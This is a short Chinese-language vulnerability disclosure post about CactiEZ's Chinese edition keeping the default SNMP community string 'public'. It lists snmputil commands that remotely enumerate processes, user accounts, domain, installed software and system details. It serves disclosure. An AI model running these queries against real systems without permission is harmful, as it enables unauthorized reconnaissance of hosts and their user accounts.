CactiEZ 中文版snmp默认团体名漏洞

南国利剑 2012-06-04 200654人围观 ,发现 4 个不明物体 漏洞

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。

如:

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.4.2.1.2   //**进程列表

snmputil.exe walk 127.0.0.1 public .1.3.6.1.4.77.1.2.25.1.1   //**用户列表

snmputil.exe get 127.0.0.1 public .1.3.6.1.4.77.1.4.1.0   //**域名

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.6.3.1.2   //**安装的软件

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.1   //**系统信息

发表评论

已有 4 条评论

取消
Loading...

特别推荐

推荐关注

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php